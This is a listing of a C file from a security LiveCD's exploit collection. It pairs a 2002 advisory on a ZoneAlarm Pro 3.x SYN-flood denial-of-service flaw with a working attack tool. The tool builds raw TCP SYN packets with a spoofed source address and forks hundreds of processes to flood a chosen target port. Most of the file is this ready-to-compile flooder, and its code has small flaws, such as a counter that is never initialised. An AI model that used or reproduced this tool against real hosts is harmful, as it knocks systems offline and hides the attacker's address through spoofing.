home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / firewall / ZoneAlarm / l-zonealarm.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  8KB  |  236 lines
  1. /*
  2. Start Advisory
  3. NSSI Technologies Inc Research Labs Security Advisory 
  4. http://www.nssolution.com (Philippines / .ph) 
  5. "Maximum e-security" 
  6. http://nssilabs.nssolution.com
  7. ZoneAlarm Pro 3.1 and 3.0 Denial of Service Vulnerability
  8. Author: Abraham Lincoln Hao / SunNinja
  9. e-Mail: abraham@nssolution.com / SunNinja@Scientist.com
  10. Advisory Code: NSSI-2002-zonealarm3 
  11. Tested: Under Win2k Advance Server with SP3 / WinNT 4.0 with SP6a / Win2K Professional / WinNT 4.0 workstation 
  12. Vendor Status:  Zone Labs is already contacted 1 month ago and they informed me that they going to release an update or new version to patched the problem. 
  13. This vulnerability is confirmed by the vendor.
  14. Vendors website: http://www.zonelabs.com
  15. Severity: High
  16.  
  17. Overview:
  18.  
  19. New ZoneAlarm« Pro delivers twice the securityZone Labs award-winning, personal firewall trusted by millions, plus advanced privacy features. 
  20. the award-winning PC firewall that blocks intrusion attempts and protects against Internet-borne threats like worms, Trojan horses, and spyware.   
  21. ZoneAlarm Pro 3.1 and 3.0  doubles your protection with enhanced Ad Blocking and expanded Cookie Control to speed up your Internet experience and stop 
  22. Web site spying. Get protected. Compatible with Microsoft« Windows« 98/Me/NT/2000 and XP.    
  23. ZoneAlarm Pro 3.1.291 and 3.0  contains vulnerability that would let the attacker consume all your CPU and Memory usage that would result to Denial of 
  24. Service Attack through sending  multiple syn packets / synflooding.  
  25.  
  26. Details:
  27.  
  28. Zone-Labs ZoneAlarm Pro 3.1.291 and 3.0 contains a vulnerability that would let the attacker consume all your CPU and Memory usage that would result to 
  29. Denial of Service Attack through Synflooding that would cause the machine to stop from responding. Zone-Labs ZoneAlarm Pro 3.1.291 and 3.0 is also vulnerable 
  30. with IP Spoofing. This Vulnerabilities are confirmed from the vendor.
  31.  
  32. Test diagram:
  33. [*Nix b0x with IP Spoofing scanner / Flooder] <===[10/100mbps switch===> [Host with ZoneAlarm] 
  34.  1] Tested under default install of the 2 versions after sending minimum of 300 Syn Packets to port 1-1024 the machine will hang-up until the attack stopped.
  35. 2] We configured the ZoneAlarm firewall both version to BLOCK ALL traffic setting after sending a minimum of 300 Syn Packets to port  1-1024 the machine will
  36. hang-up until the attack stopped. 
  37.  
  38. Workaround:
  39. Disable ZoneAlarm and Hardened TCP/IP stack of your windows and Install latest Security patch.
  40. Note: To people who's having problem reproducing the vulnerability let me know :)
  41. Any Questions? Suggestions? or Comments? let us know. 
  42. e-mail: nssilabs@nssolution.com / abraham@nssolution.com / infosec@nssolution.com
  43. greetings:
  44. nssilabs team, especially to b45h3r and rj45, Most skilled and pioneers of NSSI good luck!. 
  45. (mike@nssolution.com / aaron@nssolution.com),  Lawless the saint ;), dig0, p1x3l, dc and most of all to my Lorie.  
  46.  
  47. End Advisory
  48.  
  49. L-zonealarm.c compile with gcc l-zonealarm.c -o l-zonealarm
  50. greets        Valk , harada ,bono-sad , my family .
  51. email         lupsyn@mojodo.it
  52. */
  53.  
  54. #include <stdio.h>
  55. #include <stdlib.h>
  56. #include <unistd.h>
  57. #include <time.h>
  58. #include <strings.h>
  59. #include <sys/types.h>
  60. #include <sys/socket.h>
  61. #include <netinet/in_systm.h>
  62. #include <netinet/in.h>
  63. #include <netinet/ip.h>
  64. #include <netinet/tcp.h>
  65. #include <arpa/inet.h>
  66. #include <netdb.h>
  67. #include <errno.h>
  68.  
  69. #define MAX_CHILDREN            30
  70.  
  71. void die(char *msg)
  72. {
  73.         perror(msg);
  74.         exit(errno);
  75. }
  76.  
  77.  
  78. void usage()
  79. {
  80.     fprintf(stdout,"\n[************************************]\n"
  81.           "[*] Zone Alarm dos coded by lupsyn [*]\n"
  82.                   "[*] Usage ./l-za srcIP dstIP port  [*]\n"
  83.                   "[************************************]\n\n");
  84.     exit(0);
  85. }
  86.  
  87.  
  88.  
  89. u_short in_cksum(u_short *addr, int len)    /* function is from ping.c */
  91.     register int nleft = len;
  92.     register u_short *w = addr;
  93.     register int sum = 0;
  94.     u_short answer =0;
  95.    
  96.     while (nleft > 1) 
  97.            {
  98.            sum += *w++;
  99.            nleft -= 2;
  100.           }
  101.     if (nleft == 1) 
  102.          {      
  103.            *(u_char *)(&answer) = *(u_char *)w;
  104.         sum += answer;
  105.          }
  106.     sum = (sum >> 16) + (sum & 0xffff);
  107.     sum += (sum >> 16);
  108.     answer = ~sum;
  109.     return(answer);
  110. }
  111.  
  112.  
  113. u_long getaddr(char *hostname)    
  115.     struct hostent *hp;
  116.   
  117.     if ((hp = gethostbyname(hostname)) == NULL) 
  118.     {
  119.         fprintf(stderr, "Could not resolve %s.\n", hostname);
  120.         exit(1);
  121.         }
  122.         return *(u_long *)hp->h_addr;
  123. }
  124.  
  125.  
  126.  
  127. void dosynpacket(unsigned char *source_addr, unsigned char *dest_addr, int dest_port)
  128. {
  129.     struct send_tcp
  130.        {
  131.           struct iphdr ip;
  132.           struct tcphdr tcp;
  133.        } send_tcp;
  134.    
  135.     struct pseudo_header
  136.        {
  137.           unsigned int source_address;
  138.           unsigned int dest_address;
  139.           unsigned char placeholder;
  140.           unsigned char protocol;
  141.           unsigned short tcp_length;
  142.           struct tcphdr tcp;
  143.        } pseudo_header;
  144.    
  145.     int tcp_socket;
  146.        struct sockaddr_in sin;
  147.        int sinlen;
  148.             
  149.        /* form ip packet */
  150.        send_tcp.ip.ihl = 5;
  151.        send_tcp.ip.version = 4;
  152.        send_tcp.ip.tos = 0;
  153.        send_tcp.ip.tot_len = htons(40);
  154.        send_tcp.ip.frag_off = 0;
  155.        send_tcp.ip.ttl = 255;
  156.        send_tcp.ip.protocol = IPPROTO_TCP;
  157.        send_tcp.ip.check = 0;
  158.        send_tcp.ip.saddr =inet_addr(source_addr);
  159.        send_tcp.ip.daddr =inet_addr(dest_addr);
  160.    
  161.        /* form tcp packet */
  162.        send_tcp.tcp.dest = htons(dest_port);
  163.        send_tcp.tcp.ack_seq = 0;
  164.        send_tcp.tcp.res1 = 0;
  165.        send_tcp.tcp.doff = 5;
  166.        send_tcp.tcp.fin = 0;
  167.        send_tcp.tcp.syn = 1;
  168.        send_tcp.tcp.rst = 0;
  169.        send_tcp.tcp.psh = 0;
  170.        send_tcp.tcp.ack = 0;
  171.        send_tcp.tcp.urg = 0;
  172.        send_tcp.tcp.res2 = 0;
  173.        send_tcp.tcp.window = htons(512);
  174.        send_tcp.tcp.check = 0;
  175.        send_tcp.tcp.urg_ptr = 0;
  176.    
  177.        /* setup the sin struct */
  178.        sin.sin_family = AF_INET;
  179.        sin.sin_port = send_tcp.tcp.source;
  180.        sin.sin_addr.s_addr = send_tcp.ip.daddr;   
  181.    
  182.        /* (try to) open the socket */
  183.         if((tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) die("socket");
  184.           /* set fields that need to be changed */
  185.           send_tcp.tcp.source++;
  186.           send_tcp.ip.id++;
  187.           send_tcp.tcp.seq++;
  188.           send_tcp.tcp.check = 0;
  189.           send_tcp.ip.check = 0;
  190.       
  191.           /* calculate the ip checksum */
  192.           send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  193.  
  194.           /* set the pseudo header fields */
  195.           pseudo_header.source_address = send_tcp.ip.saddr;
  196.          pseudo_header.dest_address = send_tcp.ip.daddr;
  197.           pseudo_header.placeholder = 0;
  198.           pseudo_header.protocol = IPPROTO_TCP;
  199.           pseudo_header.tcp_length = htons(20);
  200.           bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  201.           send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
  202.           sinlen = sizeof(sin);
  203.           if((sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen))<0) die("sendto");
  204.        close(tcp_socket);
  205. }
  206.  
  207. main(int argc, char *argv[])
  208.  
  209. {
  210.     int i=0,childs;
  211.     if (argc<3) usage();
  212.     fprintf (stdout,"\n[*] Let's start dos  [*]\n");
  213.          fprintf (stdout,  "[*] Wait 30 sec and after try ping %s at port %d [*]\n",argv[2],atoi(argv[3]));
  214.         fprintf (stdout,  "[*] www.mojodo.it    [*]\n");
  215.     fprintf (stdout,  "[*] esc with ctrl+c  [*]\n\n");
  216.  
  217.     for (i ; i<400 ;i++)
  218.     {
  219.         if(childs >= MAX_CHILDREN) wait(NULL) ;
  220.         switch (fork())
  221.             {
  222.                 case 0:
  223.                 dosynpacket(argv[1],argv[2],atoi(argv[3]));
  224.                 exit(0);
  225.                             case -1:
  226.                              die("fork");
  227.                 default:
  228.                             childs++;
  229.                             break;
  230.             }
  231.  
  232.  
  233.     }while(childs--) wait(NULL);
  234. }
  235.                   
  236.